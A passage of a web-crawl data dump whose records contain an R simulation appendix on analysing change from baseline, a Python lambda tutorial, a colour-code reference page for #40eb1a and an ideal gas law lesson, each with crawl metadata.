2\nrm(list=ls())\nset.seed(12345)\nn<-15\nmu<-0\nsd<-20\nb<-rnorm(n,mu,sd)\ny<-rnorm(n,mu,sd)\nr<-0.75\n#correlation coefficient\nf<-b*r+y*(1-r^2)^0.5+200\nh<-rnorm(n,0.5,0.01)\n#percentage change\nf<-f-(f*h)\nf<-round(f)\n#follow-up score\nb<-round(b)+200\n#baseline score\nfun<-function(b,f){\nl<-list(b,f)\nstripchart(l,vertical=T,group.names=c(\"Baseline\",\"Follow-up\"),xlim=c(0.7,2.3),pch=20,\nmethod=\"stack\",main=\"Change from Baseline to Follow-up\")\nfor(i in (1:length(b))){\nlines(c(1,2),c(b[i],f[i]),lty=3,col=4)\n}\nmtext(side=1,line=3, \"B~N(200,20), P~N(0.5,0.01)\")\n}\nfun(b,f)\nFigure 3\nrm(list=ls())\nset.seed(12345)\nn<-100\nmu<-0\nsd<-20\nR<-NULL\nmc<-mp<-sdc<-sdp<-atc<-atp<-NULL\nfor(s in c(0.01,0.05,0.1,0.2)){\n2 0 Responsible\nProgrammer: Ling Zhang.\nZhang, L. and Han, K. (2009)\n12/17\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\nfor(k in 1:100){\nfor(j in 1:100){\nb<-rnorm(n,mu,sd)\ny<-rnorm(n,mu,sd)\nr<-0.75\n#correlation coefficient\nf<-b*r+y*(1-r^2)^0.5+200\nh<-rnorm(n,0.5,s)\n#percentage change\nf<-f-(f*h)\nf<-round(f)\n#follow-up score\nb<-round(b)+200\n#baseline score\nc<-b-f\np<-(b-f)/b\nmc<-mean(c)\nmp<-mean(p)\nsdc<-sd(c)\nsdp<-sd(p)\natc[j]<-abs(mc/sdc)\n#absolute value of tc, i.e. jtcj\natp[j]<-abs(mp/sdp)\n#absolute value of tc, i.e. jtpj\n}\natc<-na.omit(atc)\natp<-na.omit(atp)\neatc<-mean(atc)\n#expected value of jtcj\neatp<-mean(atp)\n#expected value of jtpj\nR[k]<-eatc/eatp\n#value of the ratio test statistic R\n}\nif(s<=0.01){\nplot(density(R),xlim=c(0.51,1),ylim=c(0,210),xlab=\"B~N(200,20), P~N(0.5,SD(P))\",\nylab=\"Density\",main=\"Distribution of R\")\n}\nelse{\nif(s<=0.05){\nlines(density(R),col=2,lty=2)\n}\nelse{\nif(s<=0.1){\nlines(density(R),col=3,lty=3)\n}\nelse{\nlines(density(R),col=4,lty=4)\n}\n}\n}\n}\nlegend(0.6,200,c(\"SD(P)=0.01\",\"SD(P)=0.05\",\"SD(P)=0.1\",\"SD(P)=0.2\"),lty=c(1,2,3,4),\ncol=c(1,2,3,4),bty=\"n\")\nFigure 4\nrm(list=ls())\nset.seed(12345)\nn<-15\nmu<-0\nsd<-20\nb<-rnorm(n,mu,sd)\nZhang, L. and Han, K. (2009)\n13/17\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\ny<-rnorm(n,mu,sd)\nr<-0.75\n#correlation coefficient\nf<-b*r+y*(1-r^2)^0.5+200\nh<-rnorm(n,100,5)\n#absolute change\nf<-f-h\nf<-round(f)\n#follow-up score\nb<-round(b)+200\n#baseline score\nfun<-function(b,f){\nl<-list(b,f)\nstripchart(l,vertical=T,group.names=c(\"Baseline\",\"Follow-up\"),xlim=c(0.7,2.3),pch=20,\nmethod=\"stack\",main=\"Change from Baseline to Follow-up\")\nfor(i in (1:length(b))){\nlines(c(1,2),c(b[i],f[i]),lty=3,col=4)\n}\nmtext(side=1,line=3, \"B~N(200,20), C~N(100,5)\")\n}\nfun(b,f)\nFigure 5\nrm(list=ls())\nset.seed(12345)\nn<-100\nmu<-0\nsd<-20\nR<-NULL\nmc<-mp<-sdc<-sdp<-atc<-atp<-NULL\nfor(s in c(5,10,20,40)){\nfor(k in 1:100){\nfor(j in 1:100){\nb<-rnorm(n,mu,sd)\ny<-rnorm(n,mu,sd)\nr<-0.75\nf<-b*r+y*(1-r^2)^0.5+200\nh<-rnorm(n,100,s)\nf<-f-h\nf<-round(f)\nb<-round(b)+200\nc<-b-f\np<-(b-f)/b\nmc<-mean(c)\nmp<-mean(p)\nsdc<-sd(c)\nsdp<-sd(p)\natc[j]<-abs(mc/sdc)\natp[j]<-abs(mp/sdp)\n}\natc<-na.omit(atc)\natp<-na.omit(atp)\neatc<-mean(atc)\neatp<-mean(atp)\nR[k]<-eatc/eatp\n}\nif(s<=5){\nZhang, L. and Han, K. (2009)\n#correlation coefficient\n#absolute change\n#follow-up score\n#baseline score\n#absolute value of tc, i.e.\n#absolute value of tp, i.e.\njtcj\njtpj\n#expected value of jtcj\n#expected value of jtpj\n#value of the ratio test statistic R\n14/17\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\nplot(density(R),xlim=c(0.99,1.04),ylim=c(0,180),xlab=\"B~N(200,20), P~N(100,SD(C))\",\nylab=\"Density\",main=\"Distribution of R\")\n}\nelse{\nif(s<=10){\nlines(density(R),col=2,lty=2)\n}\nelse{\nif(s<=20){\nlines(density(R),col=3,lty=3)\n}\nelse{\nlines(density(R),col=4,lty=4)\n}\n}\n}\n}\nlegend(1.02,150,c(\"SD(C)=5\",\"SD(C)=10\",\"SD(C)=20\",\"SD(C)=40\"),lty=c(1,2,3,4),\ncol=c(1,2,3,4),bty=\"n\")\nFigure 6\nrm(list=ls())\nset.seed(12345)\nn<-100\nmu<-0\nR<-NULL\nmc<-mp<-sdc<-sdp<-atc<-atp<-NULL\nfor(sd in c(20,10)){\nfor(muc in c(100,50)){\nfor(k in 1:100){\nfor(j in 1:100){\nb<-rnorm(n,mu,sd)\ny<-rnorm(n,mu,sd)\nr<-0.75\nf<-b*r+y*(1-r^2)^0.5+200\nh<-rnorm(n,muc,10)\nf<-f-h\nf<-round(f)\nb<-round(b)+200\nc<-b-f\np<-(b-f)/b\nmc<-mean(c)\nmp<-mean(p)\nsdc<-sd(c)\nsdp<-sd(p)\natc[j]<-abs(mc/sdc)\natp[j]<-abs(mp/sdp)\n}\natc<-na.omit(atc)\natp<-na.omit(atp)\neatc<-mean(atc)\neatp<-mean(atp)\nR[k]<-eatc/eatp\nZhang, L. and Han, K. (2009)\n#correlation coefficient\n#absolute change\n#follow-up score\n#baseline score\n#absolute value of tc, i.e.\n#absolute value of tp, i.e.\njtcj\njtpj\n#expected value of jtcj\n#expected value of jtpj\n#value of the ratio test statistic R\n15/17\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\n}\nif(sd>=20&muc>=100){\nplot(density(R),xlim=c(0.975,1.03),ylim=c(0,210),\nxlab=\"B~N(200,SD(B)), C~N(Mean(C),10)\",ylab=\"Density\",main=\"Distribution of R\")\n}\nelse{\nif(sd>=10&muc>=100){\nlines(density(R),col=2,lty=2)\n}\nelse{\nif(sd<=10){\nlines(density(R),col=4,lty=3)\n}\nelse{\n}\n}\n}\n}\n}\nlegend(0.99,200,c(\"SD(B)=20,Mean(C)=100\",\"SD(B)=10,Mean(C)=100\",\"SD(B)=10,Mean(C)=50\"),\nlty=c(1,2,3),col=c(1,2,4),bty=\"n\")\nFigure 7\nrm(list=ls())\npar(mfrow=c(1,2),pty=\"s\")\nn<-100\nmu<-0\nsd<-10\nSDC<-SDC2<-SDP<-SDP2<-matrix(0,100,21)\nfor(j in 1:100){\nb<-rnorm(n,mu,sd)\ny<-rnorm(n,mu,sd)\nr<-NULL\nbb<-b\nfor(i in 1:21){\nr[i]<-0.05*(i-1)\nf<-b*r[i]+y*(1-r[i]^2)^0.5+50\nh<-rnorm(n,0.1,0.02)\nf<-f-(f*h)\nf<-round(f)\nf2<-f-5\nb<-round(b)+50\nb2<-b-5\nc<-b-f\nc2<-b2-f2\np<-c/b\np2<-c2/b2\nSDC[j,i]<-sd(c)\nSDC2[j,i]<-sd(c2)\nSDP[j,i]<-sd(p)\nSDP2[j,i]<-sd(p2)\nb<-bb\n}\nZhang, L. and Han, K. (2009)\n#correlation coefficient\n#percentage change\n#follow-up score before transformation\n#follow-up score after transformation\n#baseline score before transformation\n#baseline score after transformation\n16/17\nHow to Analyze Change from Baseline: Absolute or Percentage Change?\n}\nMSDC<-MSDC2<-MSDP<-MSDP2<-NULL\nfor(i in 1:21){\nMSDC[i]<-mean(SDC[,i])\n}\nfor(i in 1:21){\nMSDC2[i]<-mean(SDC2[,i])\n}\nplot(r,MSDC,type=\"l\",xlab=\"Correlation Coefficient r\",ylab=\"SD(C)\")\nlines(r,MSDC2,type=\"l\",lty=2,col=2)\nlegend(0,7,c(\"Before Transformation\",\n\"After Transformation\"),lty=c(1,2),col=c(1,2),bty=\"n\")\nmtext(side=1,line=4, \"B~N(50,10), P~N(0.1,0.02)\")\nfor(i in 1:21){\nMSDP[i]<-mean(SDP[,i])\n}\nfor(i in 1:21){\nMSDP2[i]<-mean(SDP2[,i])\n}\nplot(r,MSDP,type=\"l\",xlab=\"Correlation Coefficient r\",ylab=\"SD(P)\")\nlines(r,MSDP2,type=\"l\",lty=2,col=2)\nlegend(0,0.15,c(\"Before Transformation\",\n\"After Transformation\"),lty=c(1,2),col=c(1,2),bty=\"n\")\nmtext(side=1,line=4, \"B~N(50,10), P~N(0.1,0.02)\")\nZhang, L. and Han, K. (2009)\n17/17\n```",
null,
"# Intelligence Testing: Wechsler and Stanford-Binet Scales Wechsler Adult Intelligence Scale (WAIS)",
null,
"# Male Chronic pelvic pain syndrome Dr. Kan Chi Fai Associate Consultant",
null,
""
] | [
null,
"http://spotidoc.com/theme/calypso2/static/img/shp.png",
null,
"http://cdn1.spotidoc.com/store/data/000076182_2-5901237c5ac4b9eb2c2ae7346addf4d2-250x500.png",
null,
"http://cdn1.spotidoc.com/store/data/000021400_2-ca3248b358a2880175f24b20984a14f9-250x500.png",
null,
"http://cdn1.spotidoc.com/store/data/000146516_1-4adc1d728dc521c7fbaeb2f6e00e2e63-250x500.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8617699,"math_prob":0.953143,"size":53541,"snap":"2020-34-2020-40","text_gpt3_token_len":14692,"char_repetition_ratio":0.20251414,"word_repetition_ratio":0.14379603,"special_character_ratio":0.28258717,"punctuation_ratio":0.13922003,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99472,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,null,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-19T00:32:50Z\",\"WARC-Record-ID\":\"<urn:uuid:d5643269-353a-4694-af9b-18e44c634f30>\",\"Content-Length\":\"74835\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:06f5cb9c-0bee-4c28-8300-c15471917694>\",\"WARC-Concurrent-To\":\"<urn:uuid:4be75cc2-d830-4c39-b4bf-b555b4c8d9fc>\",\"WARC-IP-Address\":\"104.27.170.156\",\"WARC-Target-URI\":\"http://spotidoc.com/doc/196882/how-to-analyze-change-from-baseline--absolute-or-percenta.\",\"WARC-Payload-Digest\":\"sha1:3VM3EWDYLET67SKRJU6VVDULBLLMJZTD\",\"WARC-Block-Digest\":\"sha1:WI3SAFTHUHAYVZXV7ISFNXYMVVZCU6KY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400189264.5_warc_CC-MAIN-20200918221856-20200919011856-00599.warc.gz\"}"} |
https://aiforevery1.com/lambdafunction/ | [
"# Anonymous / Lambda Function\n\n## Anonymous / Lambda Function\n\nIn Python, anonymous function is a function that is defined without a name.\n\n• Normal functions are defined using the 'def' keyword.\n• Anonymous functions are defined using the 'lambda' keyword.\n\n• ## Rules of Lambda Function\n\n• Lambda functions are small functions usually not more than a line.\n• The body of lambda functions consists of only one expression.\n• Lambda functions can have any number of arguments just like a normal function.\n• The result of the expression is the value when the lambda is applied to an argument.\n• There is no need for any return statement in lambda function.\n• It cannot contain commands or multiple expressions.\n• Lambda functions have their own local namespace and cannot access variables other than those in their parameter list and those in the global namespace.\n\n• ## Syntax\n\n``` lambda [arg1,arg2,....,argn]:expression\n```\n\n## Example 1: Normal Function\n\n```# Function to adds two numbers and returns the output\nreturn x + y\n\n# Calling the Function\n\nOutput:\n35\n```\n\n## Example 2: Lambda Function\n\n```# Lambda Function to adds two numbers,returns the output and called through the variable\nsum = lambda x, y: x + y\n\n# call the lambda function\nprint(\"Sum of two numbers : \",sum(10,25))\n\nOutput:\nSum of two numbers : 35\n```\n• Here we are using two arguments x and y.\n• Expression after colon is the body of the lambda function.\n• Lambda function has no name and is called through the variable it is assigned to.\n\n• (OR)\n\n```# Lambda Function to adds two numbers and returns the output\n(lambda x, y: x + y)(10,25)\n\nOutput:\n35\n```\n\n## Example 3 :\n\n```# Program to filter out only the odd items from a list\nmylist = [1 , 5 , 15 , 22 , 58 , 98]\noddlist = list(filter(lambda x: (x%2 != 0), mylist))\nprint(oddlist)\n\nOutput:\n[1, 5, 15]\n```\n\n## Example 4:\n\n```# Program to display cube of each item in a list using map()\nmylist2 = [1, 2, 3, 4, 5, 6, 7]\ncubelist = list(map(lambda x: x ** 3, mylist2))\nprint(cubelist)\n\nOutput:\n[1, 8, 27, 64, 125, 216, 343]\n```\nTotal Website Visits: 40451"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.5422109,"math_prob":0.9774163,"size":1946,"snap":"2020-24-2020-29","text_gpt3_token_len":512,"char_repetition_ratio":0.18743563,"word_repetition_ratio":0.044871796,"special_character_ratio":0.26978418,"punctuation_ratio":0.16208792,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9906672,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-07-02T16:41:40Z\",\"WARC-Record-ID\":\"<urn:uuid:d401ca83-b976-46ec-b9ee-9f0692943cdd>\",\"Content-Length\":\"37165\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:295652a0-c2e7-4ed0-9646-0b56cb1cdc43>\",\"WARC-Concurrent-To\":\"<urn:uuid:74dc80ee-452f-444d-8446-e3b357d83b3b>\",\"WARC-IP-Address\":\"160.153.137.40\",\"WARC-Target-URI\":\"https://aiforevery1.com/lambdafunction/\",\"WARC-Payload-Digest\":\"sha1:3UESD7SA3YLSWPTBTEGQOWFIKDVYPKAI\",\"WARC-Block-Digest\":\"sha1:RVCO3ZZZBGJ6LUE3DY46NADQUYFOWMYL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-29/CC-MAIN-2020-29_segments_1593655879532.0_warc_CC-MAIN-20200702142549-20200702172549-00251.warc.gz\"}"} |
http://www.mathspadilla.com/3ESO/Unit6-Equations/problems2.html | [
"# problems\n\n1. Calculate two consecutive natural numbers whose product equals 992.",
null,
"",
null,
"2. Calculate the dimensions of a rectangle which has a perimeter of 24 m and an area of 32 m2.",
null,
"",
null,
"NOTE: If a = 1, the equation is x2 – sx +p = 0, where “s” is the sum of the solutions and “p” is their product.\n\nExercises: solve the following problems and check the solution/s:\n\n1.- The product of a number increased 3 units by the same number decreased 4 units, is 98. Find out the number.\n\n2.- Calculate the perimeter of a swimming pool, knowing that its length is 3/4 its widht and the area is 12m2.\n\n3.- Calculate the length of the catheti of an isosceles triangle whose area is 50m2.\n\n4.- Find the quadratic equation whose solutions are -3 and 7 and check it.\n\nSolutions: 1) -10 or 11; 2) 14 m; 3) 10 m; 4) x2 - 4x - 21 = 0"
] | [
null,
"http://www.mathspadilla.com/3ESO/Unit6-Equations/eXe_LaTeX_math_1.1.gif",
null,
"http://www.mathspadilla.com/3ESO/Unit6-Equations/eXe_LaTeX_math_2.1.gif",
null,
"http://www.mathspadilla.com/3ESO/Unit6-Equations/eXe_LaTeX_math_3.1.gif",
null,
"http://www.mathspadilla.com/3ESO/Unit6-Equations/eXe_LaTeX_math_4.1.gif",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.90614575,"math_prob":0.9998628,"size":885,"snap":"2020-10-2020-16","text_gpt3_token_len":252,"char_repetition_ratio":0.12485812,"word_repetition_ratio":0.0,"special_character_ratio":0.30282485,"punctuation_ratio":0.13471502,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9996069,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,2,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-06T15:59:23Z\",\"WARC-Record-ID\":\"<urn:uuid:1f4c086a-8499-41f1-8d13-61666ca608ff>\",\"Content-Length\":\"4272\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7503d9e4-6310-4fe7-8049-1486c219c4cb>\",\"WARC-Concurrent-To\":\"<urn:uuid:9004a4cc-a43d-4f64-a47b-3e989b44dc9d>\",\"WARC-IP-Address\":\"37.152.88.24\",\"WARC-Target-URI\":\"http://www.mathspadilla.com/3ESO/Unit6-Equations/problems2.html\",\"WARC-Payload-Digest\":\"sha1:26RREYVB37QVCB5X66XFKVIVXKR7DMGA\",\"WARC-Block-Digest\":\"sha1:VX66LG6RD33PWQC5FXI53AWL25N4MQBU\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585371637684.76_warc_CC-MAIN-20200406133533-20200406164033-00219.warc.gz\"}"} |
https://www.colorhexa.com/40eb1a | [
"# #40eb1a Color Information\n\nIn a RGB color space, hex #40eb1a is composed of 25.1% red, 92.2% green and 10.2% blue. Whereas in a CMYK color space, it is composed of 72.8% cyan, 0% magenta, 88.9% yellow and 7.8% black. It has a hue angle of 109.1 degrees, a saturation of 83.9% and a lightness of 51.2%. #40eb1a color hex could be obtained by blending #80ff34 with #00d700. Closest websafe color is: #33ff33.\n\n• R 25\n• G 92\n• B 10\nRGB color chart\n• C 73\n• M 0\n• Y 89\n• K 8\nCMYK color chart\n\n#40eb1a color description : Vivid lime green.\n\n# #40eb1a Color Conversion\n\nThe hexadecimal color #40eb1a has RGB values of R:64, G:235, B:26 and CMYK values of C:0.73, M:0, Y:0.89, K:0.08. Its decimal value is 4254490.\n\nHex triplet RGB Decimal 40eb1a `#40eb1a` 64, 235, 26 `rgb(64,235,26)` 25.1, 92.2, 10.2 `rgb(25.1%,92.2%,10.2%)` 73, 0, 89, 8 109.1°, 83.9, 51.2 `hsl(109.1,83.9%,51.2%)` 109.1°, 88.9, 92.2 33ff33 `#33ff33`\nCIE-LAB 82.151, -75.204, 76.126 32.007, 60.578, 10.983 0.309, 0.585, 60.578 82.151, 107.008, 134.651 82.151, -70.851, 97.862 77.832, -62.8, 46.116 01000000, 11101011, 00011010\n\n# Color Schemes with #40eb1a\n\n• #40eb1a\n``#40eb1a` `rgb(64,235,26)``\n• #c51aeb\n``#c51aeb` `rgb(197,26,235)``\nComplementary Color\n• #a9eb1a\n``#a9eb1a` `rgb(169,235,26)``\n• #40eb1a\n``#40eb1a` `rgb(64,235,26)``\n• #1aeb5c\n``#1aeb5c` `rgb(26,235,92)``\nAnalogous Color\n• #eb1aa9\n``#eb1aa9` `rgb(235,26,169)``\n• #40eb1a\n``#40eb1a` `rgb(64,235,26)``\n• #5c1aeb\n``#5c1aeb` `rgb(92,26,235)``\nSplit Complementary Color\n• #eb1a40\n``#eb1a40` `rgb(235,26,64)``\n• #40eb1a\n``#40eb1a` `rgb(64,235,26)``\n• #1a40eb\n``#1a40eb` `rgb(26,64,235)``\n• #ebc51a\n``#ebc51a` `rgb(235,197,26)``\n• #40eb1a\n``#40eb1a` `rgb(64,235,26)``\n• #1a40eb\n``#1a40eb` `rgb(26,64,235)``\n• #c51aeb\n``#c51aeb` `rgb(197,26,235)``\n• #2baa0f\n``#2baa0f` `rgb(43,170,15)``\n• #31c111\n``#31c111` `rgb(49,193,17)``\n• #37d913\n``#37d913` `rgb(55,217,19)``\n• #40eb1a\n``#40eb1a` `rgb(64,235,26)``\n• #54ed31\n``#54ed31` `rgb(84,237,49)``\n• #67ef49\n``#67ef49` `rgb(103,239,73)``\n• #7bf160\n``#7bf160` `rgb(123,241,96)``\nMonochromatic Color\n\n# Alternatives to #40eb1a\n\nBelow, you can see some colors close to #40eb1a. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #74eb1a\n``#74eb1a` `rgb(116,235,26)``\n• #63eb1a\n``#63eb1a` `rgb(99,235,26)``\n• #51eb1a\n``#51eb1a` `rgb(81,235,26)``\n• #40eb1a\n``#40eb1a` `rgb(64,235,26)``\n• #2feb1a\n``#2feb1a` `rgb(47,235,26)``\n• #1deb1a\n``#1deb1a` `rgb(29,235,26)``\n• #1aeb28\n``#1aeb28` `rgb(26,235,40)``\nSimilar Colors\n\n# #40eb1a Preview\n\nThis text has a font color of #40eb1a.\n\n``<span style=\"color:#40eb1a;\">Text here</span>``\n#40eb1a background color\n\nThis paragraph has a background color of #40eb1a.\n\n``<p style=\"background-color:#40eb1a;\">Content here</p>``\n#40eb1a border color\n\nThis element has a border color of #40eb1a.\n\n``<div style=\"border:1px solid #40eb1a;\">Content here</div>``\nCSS codes\n``.text {color:#40eb1a;}``\n``.background {background-color:#40eb1a;}``\n``.border {border:1px solid #40eb1a;}``\n\n# Shades and Tints of #40eb1a\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #010600 is the darkest color, while #f5fef2 is the lightest one.\n\n• #010600\n``#010600` `rgb(1,6,0)``\n• #061802\n``#061802` `rgb(6,24,2)``\n• #0b2a04\n``#0b2a04` `rgb(11,42,4)``\n• #0f3c05\n``#0f3c05` `rgb(15,60,5)``\n• #144e07\n``#144e07` `rgb(20,78,7)``\n• #186008\n``#186008` `rgb(24,96,8)``\n• #1d720a\n``#1d720a` `rgb(29,114,10)``\n• #21840c\n``#21840c` `rgb(33,132,12)``\n• #26960d\n``#26960d` `rgb(38,150,13)``\n• #2ba80f\n``#2ba80f` `rgb(43,168,15)``\n• #2fba10\n``#2fba10` `rgb(47,186,16)``\n• #34cc12\n``#34cc12` `rgb(52,204,18)``\n• #38de13\n``#38de13` `rgb(56,222,19)``\n• #40eb1a\n``#40eb1a` `rgb(64,235,26)``\n• #4fed2c\n``#4fed2c` `rgb(79,237,44)``\n• #5eee3e\n``#5eee3e` `rgb(94,238,62)``\n• #6df050\n``#6df050` `rgb(109,240,80)``\n• #7cf162\n``#7cf162` `rgb(124,241,98)``\n• #8bf374\n``#8bf374` `rgb(139,243,116)``\n• #9af486\n``#9af486` `rgb(154,244,134)``\n• #a9f698\n``#a9f698` `rgb(169,246,152)``\n• #b8f8aa\n``#b8f8aa` `rgb(184,248,170)``\n• #c7f9bc\n``#c7f9bc` `rgb(199,249,188)``\n• #d6fbce\n``#d6fbce` `rgb(214,251,206)``\n• #e6fce0\n``#e6fce0` `rgb(230,252,224)``\n• #f5fef2\n``#f5fef2` `rgb(245,254,242)``\nTint Color Variation\n\n# Tones of #40eb1a\n\nA tone is produced by adding gray to any pure hue. In this case, #7d8b7a is the less saturated color, while #34fe07 is the most saturated one.\n\n• #7d8b7a\n``#7d8b7a` `rgb(125,139,122)``\n• #779570\n``#779570` `rgb(119,149,112)``\n• #719e67\n``#719e67` `rgb(113,158,103)``\n• #6ba85d\n``#6ba85d` `rgb(107,168,93)``\n• #65b253\n``#65b253` `rgb(101,178,83)``\n• #5ebb4a\n``#5ebb4a` `rgb(94,187,74)``\n• #58c540\n``#58c540` `rgb(88,197,64)``\n• #52ce37\n``#52ce37` `rgb(82,206,55)``\n• #4cd82d\n``#4cd82d` `rgb(76,216,45)``\n• #46e124\n``#46e124` `rgb(70,225,36)``\n• #40eb1a\n``#40eb1a` `rgb(64,235,26)``\n• #3af510\n``#3af510` `rgb(58,245,16)``\n• #34fe07\n``#34fe07` `rgb(52,254,7)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #40eb1a is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.5191791,"math_prob":0.6383754,"size":3692,"snap":"2020-24-2020-29","text_gpt3_token_len":1663,"char_repetition_ratio":0.12255965,"word_repetition_ratio":0.011090573,"special_character_ratio":0.54821235,"punctuation_ratio":0.23783186,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9765509,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-06-06T17:45:23Z\",\"WARC-Record-ID\":\"<urn:uuid:bb1a035e-8cac-40a2-8226-58d149163b12>\",\"Content-Length\":\"36276\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1c6473a5-0797-4bd3-a00c-96ef8e8a79bb>\",\"WARC-Concurrent-To\":\"<urn:uuid:4bb35498-50a6-443e-837b-a37b6d75df96>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/40eb1a\",\"WARC-Payload-Digest\":\"sha1:Z47I4PX647UMVW734J2GTEP4UL3WSOXY\",\"WARC-Block-Digest\":\"sha1:PZB2KJXHPW3V2TCUD5S5T2BJUIOVMCYE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590348517506.81_warc_CC-MAIN-20200606155701-20200606185701-00379.warc.gz\"}"} |
https://www.mometrix.com/academy/ideal-gas-law/ | [
"What is the Ideal Gas Law?\n\nIdeal Gas Law\n\nThe Ideal Gas Law is P times V equals n times R times T. P stands for pressure, V stands for volume, N stands for number of moles, in other words, the amount. Moles are used to measure chemical substances.\n\nT is the absolute temperature, always in Kelvin, and R is a universal gas constant. R takes different forms depending on the units that are needed. R can look like this, or R can look like this.\n\nNotice the only difference here is the unit for pressure. Here, kilopascals are used, and here atmospheres are used. I want to go through an example problem so we can better understand the practical application of this gas law.\n\nThe example problem we have is: You have 30.0 liters of nitrogen gas at 373 Kelvin and 203 kilopascals. How many moles of nitrogen gas do you have? We’re looking for moles here. Remember, “moles” is N.\n\nI’m going to put “N?”, because that’s what we’re looking for here. Let’s go ahead and write the equation. PV equals nRT. We’re looking for pressure. We know that pressure is expressed in those units.\n\nPressure is 203kPa times volume, which is 30.0 liters. We’re looking for moles. We don’t know what that is yet, so we’ll just leave n there. Then, we’re looking for R. We need to know which one to use.\n\nThe only difference here is the units. Since we see kilopascals right here, that means we must be looking for that constant right there. We have 8.31 times temperature (373 Kelvin). From here, we just need to divide by this right here.\n\nBecause we’re using algebra here, what we do to one side of the equation we also have to do the other. We’ll divide this side by the same thing. All of this right here crosses out, because we’re dividing one thing by the same thing.\n\nThe only thing left here is n, which is what we’re looking for. I’ll save you having to go through all the math here, but what you would do is just multiply these two numbers and then divide it by these two numbers that are multiplied by each other.\n\nN equals 1.96. Now, we need to know what unit to use. In this case, we’re using moles, so I’ll just abbreviate it mol. That’s the answer we were looking for. Now, if you’re wondering exactly how we got the units, everything has to cross out for something like this to work.\n\nWe see kilopascals here and there, so that can cross out. We see liters here and here, so that can cross out. Right here, we have moles and Kelvin (times 373 Kelvin), so those right there cross out.\n\nIf you look at it like this, kPa is over moles-K, and then we’re multiplying like this. Actually, we don’t need that number. We’re just looking at units now. This is what the units actually look like.\n\nThat got crossed out from up there. We crossed that out like that, and then we’re just left with moles. That’s where we got the unit here. That’s the answer right there. That’s the practical application.\n\nBecause you have this equation now, if any of these are missing (if any of these variables are missing), you can find the missing one as long as you have all the other information.\n\nNow, obviously, the missing information is never going to be this constant, because you already know it, but if you’re wondering what the pressure, the volume, and the number of moles or the temperature is, as long as you know the other three variables, you can figure out that missing variable.\n\n381353\n\nby Mometrix Test Preparation | Last Updated: August 15, 2019"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.9411917,"math_prob":0.9734075,"size":3347,"snap":"2019-43-2019-47","text_gpt3_token_len":797,"char_repetition_ratio":0.12025127,"word_repetition_ratio":0.0064935065,"special_character_ratio":0.23453839,"punctuation_ratio":0.13413015,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99802756,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-17T17:32:54Z\",\"WARC-Record-ID\":\"<urn:uuid:572a8d3f-a3e7-4bb6-80e4-c356271be165>\",\"Content-Length\":\"40605\",\"Content-Type\":\"application/http; 